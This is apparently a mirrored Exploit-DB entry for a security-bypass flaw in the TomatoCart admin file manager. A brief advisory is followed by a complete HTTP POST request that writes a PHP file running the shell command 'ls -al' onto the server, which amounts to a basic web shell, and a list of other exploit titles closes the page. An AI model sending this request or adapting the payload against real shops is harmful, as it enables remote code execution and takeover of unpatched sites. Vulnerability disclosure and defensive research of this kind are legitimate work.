TomatoCart – ‘json.php’ Security Bypass

Exploit Database
11 阅读

作者： Aung Khant

日期： 2013-01-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38168/

source: https://www.securityfocus.com/bid/57156/info

TomatoCart is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and create files with arbitrary shell script which may aid in further attacks.

TomatoCart versions 1.1.5 and 1.1.8 are vulnerable. 

POST /admin/json.php HTTP/1.1
Host: localhost
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo '<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>

last Exploits
TomatoCart – ‘json.php’ Security Bypass的更多信息

OpenEMR v7.0.1 – Authentication credentials brute force：
DmxReady Contact Us Manager 1.2 – SQL Injection：
Web Server Creator Web Portal 0.1 – Multiple Vulnerabilities：
Spectrum Software WebManager CMS – ‘pojam’ Cross-Site Scripting：
Fundraising Script 1.0 – SQLi：
Aptina AR0130 960P 1.3MP Camera – Remote Configuration Disclosure：
TemaTres 3.0 – Cross-Site Request Forgery (Add Admin)：
WordPress Plugin RokMicroNews – ‘thumb.php’ Multiple Vulnerabilities：